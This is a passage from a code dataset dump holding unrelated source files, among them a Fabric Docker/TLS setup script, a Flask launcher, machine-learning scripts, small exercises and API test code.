server-cert.pem cert.pem')\n\n@task\ndef install_server_certs(working_dir='', hostname=''):\n\n if ( not hostname ):\n hostname = env.host_string\n\n install_dir = '/etc/docker/certs.d'\n host_cert_dir = '{install_dir}/{hostname}'.format(install_dir=install_dir,hostname=hostname)\n \n with settings(warn_only=True):\n sudo('mkdir {install_dir}'.format(install_dir=install_dir))\n\n sudo('mkdir %(host_cert_dir)s' % {\"host_cert_dir\": host_cert_dir})\n\n with cd(working_dir):\n sudo('cp ca-key.pem server-key.pem server-cert.pem %(host_cert_dir)s' % {\"host_cert_dir\": host_cert_dir})\n\n with settings(warn_only=True):\n sudo('sudo service docker stop')\n sudo('sudo service docker start')\n\n@task\ndef install_client_certs(working_dir, hostname=''):\n\n if ( not hostname ):\n hostname = env.host_string\n\n install_dir = '~/.docker'\n\n with settings(warn_only=True):\n _create_client_hostname_dir(install_dir, hostname)\n\n tmp_dir = './tmp'\n\n with cd(working_dir):\n get('ca.pem', tmp_dir)\n get('cert.pem', tmp_dir)\n get('key.pem', tmp_dir)\n\n with lcd(tmp_dir):\n local('cp ca.pem {install_dir}/{hostname}/'.format(install_dir=install_dir, hostname=hostname))\n local('cp cert.pem {install_dir}/{hostname}/'.format(install_dir=install_dir, hostname=hostname))\n local('cp key.pem {install_dir}/{hostname}/'.format(install_dir=install_dir, hostname=hostname))\n\n@task\ndef pre_install_docker(os='ubuntu', hostname=''):\n\n if ( not hostname ):\n hostname = env.host_string\n\n if ( os == 'ubuntu' ):\n _pre_install_docker_ubuntu(hostname=hostname)\n\n@task\ndef install_docker(os='ubuntu', hostname=''):\n\n if ( not hostname ):\n hostname = env.host_string\n\n if ( os == 'ubuntu' ):\n _install_docker_ubuntu(hostname=hostname)\n\n# private helpers\n\ndef _pre_install_docker_ubuntu(hostname=''):\n docker_source_list_path = '/etc/apt/sources.list.d/docker.list'\n\n sudo('apt-get update')\n sudo('apt-get --assume-yes install apt-transport-https ca-certificates')\n sudo('apt-key adv --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys 58118E89F3A912897C070ADBF76221572C52609D')\n with settings(warn_only=True):\n sudo('rm {docker_source_list_path}'.format(docker_source_list_path=docker_source_list_path))\n sudo(\"echo 'deb https://apt.dockerproject.org/repo ubuntu-trusty main' > {docker_source_list_path}\".format(docker_source_list_path=docker_source_list_path))\n sudo('apt-get update')\n sudo('sudo apt-get purge lxc-docker')\n sudo('apt-cache policy docker-engine')\n sudo('apt-get --assume-yes install linux-image-extra-$(uname -r)')\n sudo('apt-get --assume-yes install apparmor')\n # turn off firewall\n # TODO: replace this with commands to open fw ports\n sudo('ufw disable')\n sudo('sudo reboot')\n\ndef _install_docker_ubuntu(hostname=''):\n # the initial install\n sudo('sudo apt-get --assume-yes install docker-engine')\n with settings(warn_only=True):\n sudo('sudo service docker stop')\n\n # and configure the service for TLS\n docker_service_config_file = '/etc/default/docker'\n docker_opts = 'DOCKER_OPTS=~--dns 8.8.8.8 --dns 8.8.4.4 --tls=true --tlscacert=/etc/docker/certs.d/{hostname}/ca.pem --tlscert=/etc/docker/certs.d/{hostname}/server-cert.pem --tlskey=/etc/docker/certs.d/{hostname}/server-key.pem -H=0.0.0.0:2376~'.format(hostname=hostname)\n with settings(warn_only=True):\n sudo('echo \"{docker_opts}\" > {docker_service_config_file}'.format(\n docker_service_config_file=docker_service_config_file,\n docker_opts=docker_opts))\n # the positional arguments for this are file, search, replace\n 
files.sed(docker_service_config_file, '~', '\"', use_sudo=True, backup='.grosgrain_bak')\n\ndef _create_time_stamp():\n now = datetime.now()\n return now.strftime(\"%Y_%m_%d_%H_%M_%S\")\n\ndef _create_working_dir(time_stamp=_create_time_stamp()):\n\n working_dir = 'docker_certs_working_%(time_stamp)s' % { \"time_stamp\": time_stamp }\n\n run('mkdir %(working_dir)s' % { \"working_dir\": working_dir })\n\n return working_dir\n\ndef _create_client_hostname_dir(install_dir, hostname):\n\n local('mkdir {install_dir}/{hostname}'.format(install_dir=install_dir, hostname=hostname))\n","sub_path":"grosgrain/fabfile/docker/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"390807907","text":"'''\nThis file is the gevent launcher for local / development use.\n\nSimply run it on the command line:\npython ycdl_flask_dev.py [port]\n'''\nimport gevent.monkey; gevent.monkey.patch_all()\n\nimport logging\nhandler = logging.StreamHandler()\nlog_format = '{levelname}:ycdl.{module}.{funcName}: {message}'\nhandler.setFormatter(logging.Formatter(log_format, style='{'))\nlogging.getLogger().addHandler(handler)\n\nimport argparse\nimport gevent.pywsgi\nimport sys\n\nfrom voussoirkit import pathclass\nfrom voussoirkit import vlogging\n\nimport bot\nimport ycdl\n\nimport backend\n\n####################################################################################################\n\nsite = backend.site\n\nHTTPS_DIR = pathclass.Path(__file__).parent.with_child('https')\nLOG_LEVEL = vlogging.NOTSET\n\ndef ycdl_flask_launch(\n *,\n create,\n localhost_only,\n port,\n refresh_rate,\n use_https,\n ):\n if use_https is None:\n use_https = port == 443\n\n if use_https:\n http = gevent.pywsgi.WSGIServer(\n listener=('0.0.0.0', port),\n application=site,\n keyfile=HTTPS_DIR.with_child('ycdl.key').absolute_path,\n certfile=HTTPS_DIR.with_child('ycdl.crt').absolute_path,\n )\n else:\n http = gevent.pywsgi.WSGIServer(\n listener=('0.0.0.0', port),\n application=site,\n )\n\n if localhost_only:\n site.localhost_only = True\n\n youtube_core = ycdl.ytapi.Youtube(bot.get_youtube_key())\n backend.common.init_ycdldb(youtube_core, create=create, log_level=LOG_LEVEL)\n ycdl.ytrss.log.setLevel(LOG_LEVEL)\n\n if refresh_rate is not None:\n backend.common.start_refresher_thread(refresh_rate)\n\n message = f'Starting server on port {port}'\n if use_https:\n message += ' (https)'\n print(message)\n\n try:\n http.serve_forever()\n except KeyboardInterrupt:\n pass\n\ndef ycdl_flask_launch_argparse(args):\n return ycdl_flask_launch(\n create=args.create,\n localhost_only=args.localhost_only,\n port=args.port,\n refresh_rate=args.refresh_rate,\n use_https=args.use_https,\n )\n\ndef main(argv):\n global LOG_LEVEL\n (LOG_LEVEL, argv) = vlogging.get_level_by_argv(argv)\n\n parser = argparse.ArgumentParser(description=__doc__)\n\n parser.add_argument('port', nargs='?', type=int, default=5000)\n parser.add_argument('--dont_create', '--dont-create', '--no-create', dest='create', action='store_false', default=True)\n parser.add_argument('--https', dest='use_https', action='store_true', default=None)\n parser.add_argument('--localhost_only', '--localhost-only', dest='localhost_only', action='store_true')\n parser.add_argument('--refresh_rate', '--refresh-rate', dest='refresh_rate', type=int, default=None)\n parser.set_defaults(func=ycdl_flask_launch_argparse)\n\n args = parser.parse_args(argv)\n return 
args.func(args)\n\nif __name__ == '__main__':\n raise SystemExit(main(sys.argv[1:]))\n","sub_path":"frontends/ycdl_flask/ycdl_flask_dev.py","file_name":"ycdl_flask_dev.py","file_ext":"py","file_size_in_byte":2992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"274051853","text":"#!/usr/bin/env python2.7\n\nfrom one import *\n\n# Ex 3.1\n\ndef compute_qda(trainingy, trainingx):\n def estimate_normal(features):\n mean = np.mean(features, axis=0)\n cov = np.cov(features, rowvar=0)\n return (mean, cov)\n \n x0 = trainingx[trainingy == 0]\n x1 = trainingx[trainingy == 1]\n\n assert trainingx.size == x0.size + x1.size\n\n (mu0, covmat0) = estimate_normal(x0)\n (mu1, covmat1) = estimate_normal(x1)\n\n p0 = x0.size / float(trainingx.size)\n p1 = x1.size / float(trainingx.size)\n\n return (mu0, mu1, covmat0, covmat1, p0, p1)\n\n\n# Ex 3.2\n\nfrom scipy.stats import multivariate_normal\n\ndef perform_qda(mu0, mu1, covmat0, covmat1, p0, p1, testx):\n dist0 = multivariate_normal(mean=mu0, cov=covmat0)\n dist1 = multivariate_normal(mean=mu1, cov=covmat1)\n\n result = np.zeros(testx.shape[0], dtype=np.int)\n\n for i in xrange(0, len(result)):\n x = testx[i]\n x0_prob = p0 * dist0.pdf(x)\n x1_prob = p1 * dist1.pdf(x)\n if x0_prob > x1_prob:\n result[i] = 0\n else:\n result[i] = 1\n\n return result\n\n# bind the first six parameters in perform_qda\ndef qda_classifier(m0, m1, covmat0, covmat1, p0, p1):\n return lambda testx: perform_qda(m0, m1, covmat0, covmat1, p0, p1, testx)\n\n# Ex 3.3 + 3.4\n\n# Misclassifications on training data using QDA stems from modelling error and inherent randomness:\n# QDA assumes normally distributed data.\n# As is the case when using linear regression on a nonlinear sequence of observations, QDA may yield bad results because the modelled phenomenon may be a different kind of random variable, e.g. one with an exponential distribution.\n# In contrast to NN, QDA accounts for some randomness in the approximated function, i.e. 
X \\mapsto Y may be not deterministic.\n# Whereas NN overfits in these cases, the QDA model assumes that some very unlikely observations are in the training data.\n# For example, consider a training instance (X_i, Y_i) whose feature X_i is very close to the features of training instances with a common different label Z.\n# In that case, the observation (X_i, Y_i) may be extremely unlikely, because the (X_i, Z) may be much more common.\n# NN fails in these cases, whereas QDA correctly (in most cases) assigns the label Z to observation X_i.\n# This also means that when QDA is used on the training data, it will sometimes yield wrong results if the observation is sufficiently 'unlikely'.\n\n\n# apply classifier on testx and show results in figure\n# the classifiers results are compared to testy in the figure\ndef visualizeClassification(classifier, testy, testx, show_correctness=True):\n plt.gca().set_position((.1, .3, .8, .6)) # to make a bit of room for extra text\n\n plt.xlabel('absolute value norm')\n plt.ylabel('euclidean norm')\n\n estimatedy = classifier(testx)\n\n correct_classification_rate = float(len(estimatedy[estimatedy == testy])) / len(testy) \n\n colors = np.where(testy == estimatedy, \"b\", \"r\")\n\n x0 = testx[estimatedy == 0][ : , 0]\n y0 = testx[estimatedy == 0][ : , 1]\n c0 = colors[estimatedy == 0]\n\n x1 = testx[estimatedy == 1][ : , 0]\n y1 = testx[estimatedy == 1][ : , 1]\n c1 = colors[estimatedy == 1]\n\n size = 20\n\n plt.scatter(x0, y0, marker=\"o\", c=c0, s=size)\n plt.scatter(x1, y1, marker=\"x\", c=c1, s=size)\n\n plt.figtext(0.02, 0.02, \n '''\n o: Classified as 1\n x: Classified as 7\n ''')\n\n if show_correctness:\n plt.figtext(0.7, 0.02, \n '''\n Correct Classification Rate: %.2f\n Blue: Correct Classification\n Red: Wrong Classification\n ''' % correct_classification_rate)\n\n plt.show()\n\ndef makeGridValues(absmax, euclidmax):\n absvals = (absmax / 100) * np.array(xrange(0, 100))\n euclidvals = (euclidmax / 100) * np.array(xrange(0, 100))\n\n return np.array([[absval, euclidval] for euclidval in euclidvals for absval in absvals])\n\nif __name__ == \"__main__\":\n mu0, mu1, covmat0, covmat1, p0, p1 = compute_qda(Y_train, X_train)\n\n classifier = qda_classifier(mu0, mu1, covmat0, covmat1, p0, p1)\n plt.title('Classification Results on Training Data')\n visualizeClassification(classifier, Y_train, X_train)\n plt.clf()\n\n absmax = np.max(X_train[ : , 0])\n euclidmax = np.max(X_train[ : , 1])\n\n grid_values = makeGridValues(absmax, euclidmax)\n\n plt.title('Decision Regions')\n # choose classifier(grid_values) as 'correct' Y so every classification is painted blue\n visualizeClassification(classifier, classifier(grid_values), grid_values, show_correctness=False)\n plt.clf()\n\n # Ex 3.5\n plt.title('Classification Results on Test Data')\n visualizeClassification(classifier, Y_test, X_test)\n plt.clf()\n","sub_path":"blatt03/corrected-lda/three.py","file_name":"three.py","file_ext":"py","file_size_in_byte":4795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"365693513","text":"import datetime\n\nimport trainer.corpora as crp\nimport trainer.features as ftr\nimport trainer.classifier_test as cls\nimport os\n\n# vars\ntype = \"inf-20k\"\nnltk_run = True\nsklearn_run = False\nCOUNT = 20000\ncut = int((COUNT / 2) * 3 / 4)\narray = [5000, 10000, 15000, 20000, 25000, 30000, 150000]\n\ndef run(dataset):\n\n nlt = dict()\n skl = dict()\n\n dir = \"output/\" + dataset + \"/\" + type + \"/\"\n os.makedirs(dir, 
exist_ok=True)\n\n # file\n for variable in array:\n var_name = str(variable)\n\n if nltk_run:\n nlt_file = dir + dataset + \"-\" + type + \"-\" + var_name + \"-nlt.csv\"\n nlt[var_name] = open(nlt_file, 'a')\n nlt[var_name].write(str(datetime.datetime.today()) + \"\\n\")\n\n if sklearn_run:\n skl_file = dir + dataset + \"-\" + type + \"-\" + var_name + \"-skl.csv\"\n skl[var_name] = open(skl_file, 'a')\n skl[var_name].write(str(datetime.datetime.today()) + \"\\n\")\n\n # cycle\n for x in range(0, 10):\n print(x)\n corpora = crp.Corpora(dataset, count=COUNT, shuffle=True)\n\n for variable in array:\n print(str(variable))\n var_name = str(variable)\n features = ftr.Features(corpora, total=COUNT, bigram=True, stop=False, stem=\"porter\", lower=True, inf_count=variable)\n\n posfeats = features.get_features_pos()\n negfeats = features.get_fearures_neg()\n\n trainfeats = negfeats[:cut] + posfeats[:cut]\n testfeats = negfeats[cut:] + posfeats[cut:]\n\n nlt_output, skl_output = cls.train(trainfeats, testfeats, nlt=nltk_run, skl=sklearn_run)\n\n if nltk_run:\n print(str(nlt_output))\n nlt[var_name].write(nlt_output)\n nlt[var_name].flush()\n if sklearn_run:\n print(str(skl_output))\n skl[var_name].write(skl_output)\n skl[var_name].flush()\n\n\n\ndataset_array = [\"stanford\"]\n\nfor dataset in dataset_array:\n run(dataset)","sub_path":"trainer/tests/inf.py","file_name":"inf.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"620295435","text":"import time\nimport torch\nimport numpy as np\nfrom Losses import *\nfrom ObjectModel import ObjectModel\nfrom CodeUtil import *\n\ncode, idx = get_obj_code_random(1)\nobj_model = ObjectModel()\nfc_loss = FCLoss(obj_model)\n\nn_cps = [3,5,10,20,100,1000]\ntimes = []\n\nfor n_cp in n_cps:\n pts = torch.rand([10000, 1, n_cp, 3], device='cuda', requires_grad=True)\n t = []\n p = pts[0]\n dist = obj_model.distance(code, p)\n grad = obj_model.gradient(p, dist, retain_graph=True, allow_unused=True)\n loss = fc_loss.fc_loss(pts[0], grad, code)\n for i in range(len(pts)):\n p = pts[i]\n t0 = time.time()\n dist = obj_model.distance(code, p)\n grad = obj_model.gradient(p, dist, retain_graph=True, allow_unused=True)\n loss = fc_loss.fc_loss(pts[i], grad, code)\n t.append(time.time() - t0)\n times.append(np.mean(t))\n print(n_cp, np.mean(t))\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nmatplotlib.rc('xtick', labelsize=15) \nmatplotlib.rc('ytick', labelsize=15) \n\n_ = plt.plot(n_cps,times,linewidth=3, markersize=10)\n_ = plt.xlabel('# Contact Points', fontsize=20)\n_ = plt.ylabel('Time per 1000 FC Calls (s)', fontsize=20)\n_ = plt.xscale('log')\n_ = plt.show()\n","sub_path":"ForceClosure/fig_force_closure_time.py","file_name":"fig_force_closure_time.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"43923455","text":"# least unique -> most unique\n\nimport numpy as np\n\nlambda_lya_min = 1045\nlambda_lya_max = 1185\nlambda_lya = 1215.67\nc_kms = 2.99792458e5\n\nlambda_lyb_min = 978\nlambda_lyb_max = 1014\nlambda_lyb = 1025.7\n\nzmin = 3.0\nzmax = 4.4\ndz = 0.2\nzbinlen = int((zmax-zmin)/dz+0.5) #reduced_zbinlen = int(((zmax-zmin)/dz+1)-1)\nzmin_bin = 0.0\nzmax_bin = 5.0\n\nkmin = 0 #3e-3 #0.0\nkmax = 0.06 #- 3e-3#0.06 #0.06\ndlogk = 3e-3\nkbinlen = int((kmax - kmin)/dlogk + 0.5) #reduced_kbinlen = int(((kmax-kmin)/dlogk+1)-1)\nlog_binning = 0\n\ndloglambda = 3e-5\ndv = 
c_kms * dloglambda * np.log(10)\n\nDLAcat_file = \"../Data/XQ-100_DLA_catalogue.txt\"\ncatalog = \"../Data/XQ-100_catalogue.txt\"\nnqso = 100\nmin_pix = 100\nmin_flux = -1e-15\nmin_trans = -100","sub_path":"demonstration/options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"49829135","text":"import os.path as osp\n\nimport argparse\nimport numpy as np\nimport time\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.nn import Parameter\nfrom torch_sparse import SparseTensor\nfrom torch_geometric.datasets import Reddit\nfrom torch_geometric.nn.inits import glorot, zeros\n\nfrom utils import Logger\n\nclass SAGEConv(nn.Module):\n def __init__(self,\n in_feats,\n out_feats,\n aggr,\n feat_drop=0.,\n activation=None):\n super(SAGEConv, self).__init__()\n\n self._in_feats = in_feats\n self._out_feats = out_feats\n self._aggr = aggr\n self.feat_drop = nn.Dropout(feat_drop)\n self.activation = activation\n\n self.weight = Parameter(torch.Tensor(in_feats, out_feats))\n self.root_weight = Parameter(torch.Tensor(in_feats, out_feats))\n self.bias = Parameter(torch.Tensor(out_feats))\n\n self.reset_parameters()\n\n def reset_parameters(self):\n glorot(self.weight)\n glorot(self.root_weight)\n zeros(self.bias)\n\n def forward(self, x, adj):\n x = self.feat_drop(x)\n if self._aggr == 'sum':\n out = adj.matmul(x) @ self.weight\n elif self._aggr == 'mean':\n out = adj.matmul(x, reduce=\"mean\") @ self.weight\n else:\n return ValueError(\"Expect aggregation to be 'sum' or 'mean', got {}\".format(self._aggr))\n out = out + x @ self.root_weight + self.bias\n if self.activation is not None:\n out = self.activation(out)\n return out\n\nclass GraphSAGE(nn.Module):\n def __init__(self,\n in_feats,\n n_hidden,\n n_classes,\n aggr,\n activation=F.relu,\n dropout=0.):\n super(GraphSAGE, self).__init__()\n self.layers = nn.ModuleList()\n self.layers.append(SAGEConv(in_feats, n_hidden, aggr, activation=activation))\n self.layers.append(SAGEConv(n_hidden, n_classes, aggr, feat_drop=dropout, activation=None))\n\n def reset_parameters(self):\n for layer in self.layers:\n layer.reset_parameters()\n\n def forward(self, x, edge_index):\n h = x\n for layer in self.layers:\n h = layer(h, edge_index)\n return h\n\ndef calc_acc(logits, labels, mask):\n logits = logits[mask]\n labels = labels[mask]\n _, indices = torch.max(logits, dim=1)\n correct = torch.sum(indices == labels)\n return correct.item() * 1.0 / len(labels)\n\ndef evaluate(model, features, adj, labels, train_mask, val_mask, test_mask):\n model.eval()\n with torch.no_grad():\n logits = model(features, adj)\n train_acc = calc_acc(logits, labels, train_mask)\n val_acc = calc_acc(logits, labels, val_mask)\n test_acc = calc_acc(logits, labels, test_mask)\n return train_acc, val_acc, test_acc\n\ndef main(args):\n device = f'cuda:{args.device}' if torch.cuda.is_available() else 'cpu'\n device = torch.device(device)\n\n path = osp.join('dataset', 'Reddit')\n dataset = Reddit(path)\n data = dataset[0]\n\n features = data.x.to(device)\n labels = data.y.to(device)\n edge_index = data.edge_index.to(device)\n adj = SparseTensor(row=edge_index[0], col=edge_index[1])\n train_mask = torch.BoolTensor(data.train_mask).to(device)\n val_mask = torch.BoolTensor(data.val_mask).to(device)\n test_mask = torch.BoolTensor(data.test_mask).to(device)\n\n model = GraphSAGE(dataset.num_features,\n args.n_hidden,\n dataset.num_classes,\n 
args.aggr,\n                      F.relu,\n                      args.dropout).to(device)\n\n    loss_fcn = nn.CrossEntropyLoss()\n\n    logger = Logger(args.runs, args)\n    dur = []\n    for run in range(args.runs):\n        model.reset_parameters()\n        optimizer = torch.optim.Adam(model.parameters(), lr=args.lr, weight_decay=args.weight_decay)\n        for epoch in range(1, args.epochs + 1):\n            model.train()\n            if epoch >= 3:\n                t0 = time.time()\n            # forward\n            logits = model(features, adj)\n            loss = loss_fcn(logits[train_mask], labels[train_mask])\n\n            optimizer.zero_grad()\n            loss.backward()\n            optimizer.step()\n\n            if epoch >= 3:\n                dur.append(time.time() - t0)\n                print('Training time/epoch {}'.format(np.mean(dur)))\n\n            if not args.eval:\n                continue\n\n            train_acc, val_acc, test_acc = evaluate(model, features, adj, labels, train_mask, val_mask, test_mask)\n            logger.add_result(run, (train_acc, val_acc, test_acc))\n\n            print(\"Run {:02d} | Epoch {:05d} | Loss {:.4f} | Train {:.4f} | Val {:.4f} | Test {:.4f}\".format(run, epoch, loss.item(), train_acc, val_acc, test_acc))\n\n        if args.eval:\n            logger.print_statistics(run)\n\n    if args.eval:\n        logger.print_statistics()\n\n\n    \nif __name__ == '__main__':\n    parser = argparse.ArgumentParser(description='GraphSAGE')\n    parser.add_argument(\"--device\", type=int, default=0)\n    parser.add_argument(\"--dropout\", type=float, default=0.5,\n                        help=\"dropout probability\")\n    parser.add_argument(\"--lr\", type=float, default=1e-2,\n                        help=\"learning rate\")\n    parser.add_argument(\"--epochs\", type=int, default=200,\n                        help=\"number of training epochs\")\n    parser.add_argument(\"--n-hidden\", type=int, default=16,\n                        help=\"number of hidden gcn units\")\n    parser.add_argument(\"--aggr\", type=str, choices=['sum', 'mean'], default='mean',\n                        help='Aggregation for messages')\n    parser.add_argument(\"--weight-decay\", type=float, default=5e-4,\n                        help=\"Weight for L2 loss\")\n    parser.add_argument(\"--eval\", action='store_true',\n                        help='If not set, we will only do the training part.')\n    parser.add_argument(\"--runs\", type=int, default=10)\n    args = parser.parse_args()\n    print(args)\n\n    main(args)\n","sub_path":"end_to_end/full_graph/node_classification/main_pyg_reddit_sage.py","file_name":"main_pyg_reddit_sage.py","file_ext":"py","file_size_in_byte":6124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"573821394","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 25 21:27:41 2020\n\n@author: loris\n\nDevelop a program that builds the multiplication table of any integer entered by the user. The table does not necessarily start at 1 and end at 10: the initial and final values must also be supplied by the user, as in the example below:\n \n \nBuild the times table of: 5\nStart at: 4\nEnd at: 7\n\nI will build the times table of 5 starting at 4 and ending at 7:\n5 X 4 = 20\n5 X 5 = 25\n5 X 6 = 30\n5 X 7 = 35\n\n\nNote: you must check that the user did not enter an end value smaller than the start value.\n\n\"\"\"\n\n\nprint(\"Times table, your way!\")\n\nvalidado = False\n\nwhile validado == False: \n    tabuada = int(input(\"Show the times table of: \"))\n    comeco = int(input(\"Start at: \"))\n    fim = int(input(\"End at: \"))\n    if comeco < fim and comeco != fim:\n        validado = True\n\nfor n in range(comeco, fim+1):\n    print(str(tabuada)+\" x \"+str(n)+\" = \"+str(tabuada*n))\n","sub_path":"3 - Estrutura de 
Repetição/36.py","file_name":"36.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"497279417","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Message',\n fields=[\n ('id', models.AutoField(auto_created=True, serialize=False, primary_key=True, verbose_name='ID')),\n ('title', models.CharField(max_length=100)),\n ('date', models.DateField(null=True, blank=True)),\n ('text', models.TextField(max_length=3000)),\n ],\n ),\n ]\n","sub_path":"blogblog/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"583885657","text":"from urllib.parse import quote\r\nfrom requests import Session\r\nfrom uuid import uuid4\r\nimport sys\r\n\r\n# Modify\r\n\r\nIDENTIFIER = 'bot_id'\r\nAUTHORIZATION = 'bot_key'\r\n\r\n# Do not modify\r\n\r\nCOMMANDS_URL = 'https://http.msging.net/commands'\r\nSET_METHOD = 'set'\r\n\r\nERROR_ATTENDANTS = []\r\n\r\nif len(sys.argv) < 2:\r\n print('uso: python add_attendants.py ')\r\n exit(-1)\r\n\r\nattendants_csv = open(sys.argv[1], 'r', encoding='utf8')\r\n\r\ncsv_data = None\r\n\r\ntry:\r\n csv_data = attendants_csv.read().split('\\n')[1:]\r\n attendants_csv.close()\r\nexcept Exception as ex:\r\n print('Error while parsing csv')\r\n attendants_csv.close()\r\n exit(-1)\r\n\r\n\r\ndef create_set_attendant_command(email, teams):\r\n return {\r\n 'id': str(uuid4()),\r\n 'to': 'postmaster@desk.msging.net',\r\n 'method': SET_METHOD,\r\n 'uri': '/attendants',\r\n 'type': 'application/vnd.iris.desk.attendant+json',\r\n 'resource': {\r\n 'identity': f'{quote(email)}@blip.ai',\r\n 'teams': teams\r\n }\r\n }\r\n\r\n\r\ndef get_email_teams_from_line(line):\r\n splited_line = line.split(',')\r\n email = splited_line[0]\r\n teams = splited_line[1:]\r\n return email, teams\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print(f'Starting session for {IDENTIFIER}')\r\n session = Session()\r\n session.headers = {\r\n 'Authorization': AUTHORIZATION\r\n }\r\n print(f'Found {len(csv_data)} attendants')\r\n for attendant in csv_data:\r\n email, teams = get_email_teams_from_line(attendant)\r\n command_body = create_set_attendant_command(email, teams)\r\n\r\n command_res = session.post(COMMANDS_URL, json=command_body)\r\n command_res = command_res.json()\r\n\r\n if command_res['status'] != 'success':\r\n print(f'Error adding {email}')\r\n ERROR_ATTENDANTS.append(attendant)\r\n else:\r\n print(f'Added {email}')\r\n if len(ERROR_ATTENDANTS) > 0:\r\n print(\r\n f'Saving {len(ERROR_ATTENDANTS)} not added attendants to error_{IDENTIFIER}.csv'\r\n )\r\n with open(f'error_{IDENTIFIER}.csv', 'w', encoding='utf8') as error_file:\r\n error_file.write('\\n'.join(ERROR_ATTENDANTS))\r\n error_file.close()\r\n print('Done')\r\n","sub_path":"add_attendants.py","file_name":"add_attendants.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"344484198","text":" ## - *** GAME *** -\n ##Rock | Paper | Scissors\n\nimport random\nfrom time import sleep\nimport time\n\n# Defined the countdown module:\ndef countdown(n) :\n while n > 0:\n print (n)\n sleep(1)\n n = n - 1\n if n ==0:\n 
print(\">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>START<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<\")\n\n# Assigned 0 as the starting point for the score:\nscore_Player = 0\nscore_Computer = 0\n\n# Introduce the game and ask for the gamer's name as an 'input':\nprint(str(input(\"Hello player :) Welcole to the Rock | Paper | Scissors GAME!!!\\n\\n\\t\\tPress >ENTER< to continue.\")))\nsleep(0.5)\nPlayer_One = str(input(\"Before we start; what shoul I be calling you?\\nEnter the name here: \"))\nsleep(0.4)\nprint(\"Good luck %s. Computer is known to be very lucky at this game!!!\"%(Player_One))\nsleep(1.3)\ncountdown(3)\n\n#Started the game in a while loop:\nwhile True:\n Player_Choice = str(input(\"Choose one: [Rock / Paper / Scissors]\\n(R) for Rock\\t (P) for Paper\\t (S) for Scissors: \"))\n Choice = [\"Rock\", \"Paper\", \"Scissors\"]\n Computer = (random.choice(Choice))\n \n if ((Player_Choice == \"R\" and Computer == \"Rock\") or (Player_Choice == \"P\" and Computer == \"Paper\") or (Player_Choice == \"S\" and Computer == \"Scissors\")):\n print(\"\\nComputer's Cohice: %s\\n\"%(Computer))\n print(\"It's a tie!\")\n sleep(1.6)\n score_Player = score_Player + 1\n score_Computer = score_Computer + 1\n print(\"%s: %d | Computer: %d\"%(Player_One,score_Player,score_Computer))\n \n elif((Player_Choice == \"R\" and Computer == \"Scissors\") or (Player_Choice == \"P\" and Computer == \"Rock\") or (Player_Choice == \"S\" and Computer == \"Paper\")):\n print(\"\\nComputer's Cohice: %s\\n\"%(Computer))\n print(\"%s WINS!!!\"%(Player_One))\n sleep(1.6)\n score_Player = score_Player+ 1\n print(\"%s: %d | Computer: %d\"%(Player_One,score_Player,score_Computer))\n \n else:\n print(\"\\nComputer's Cohice: %s\"%(Computer))\n print(\"Computer WINS!!!\\n\")\n sleep(1.6)\n score_Computer = score_Computer + 1\n print(\"%s: %d | Computer: %d\"%(Player_One,score_Player,score_Computer))\n# When the total score reaches to '5', it ends the game; announces the winner; and asks whether you want to try again:\n total_score = score_Computer + score_Player\n if total_score >= 5:\n sleep(0.5)\n if score_Computer > score_Player:\n print(\"\\nComputer WINS the Round!!!\")\n elif score_Computer == score_Player:\n print(\"\\nIT IS A TIE!!!\")\n else:\n print(\"\\n%s WINS the Round!!!\"%(Player_One))\n willRepeat = str(input(\"Do you want to try again? 
[Y / N] : \"))\n if willRepeat == \"Y\":\n score_Player = 0\n score_Computer = 0\n sleep(0.4)\n continue\n elif willRepeat == \"N\":\n sleep(0.3)\n break \n \n","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"71848217","text":"\"\"\"\nRun Tests on the Categories Endpoint\n\"\"\"\n\nimport logging\n\nfrom lunchable import LunchMoney\nfrom lunchable.models.categories import CategoriesObject\nfrom tests.conftest import lunchable_cassette\n\nlogger = logging.getLogger(__name__)\n\n\n@lunchable_cassette\ndef test_get_categories(lunch_money_obj: LunchMoney):\n \"\"\"\n Get Categories and Assert that they're categories\n \"\"\"\n categories = lunch_money_obj.get_categories()\n assert len(categories) >= 1\n for category in categories:\n assert isinstance(category, CategoriesObject)\n logger.info(\"%s Categories returned\", len(categories))\n\n\n@lunchable_cassette\ndef test_create_category(lunch_money_obj: LunchMoney):\n \"\"\"\n Get Categories and Assert that they're categories\n \"\"\"\n name = \"Test Category\"\n category = lunch_money_obj.insert_category(name=name,\n description=\"Test Category Description\",\n 